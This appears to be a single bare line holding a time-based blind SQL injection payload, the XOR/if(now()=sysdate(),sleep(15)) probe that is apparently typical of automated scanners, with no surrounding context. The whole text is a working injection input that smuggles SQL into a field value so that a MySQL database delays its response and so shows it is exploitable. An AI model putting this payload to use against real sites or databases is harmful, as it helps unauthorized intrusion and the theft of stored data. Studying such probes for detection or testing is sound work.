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0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z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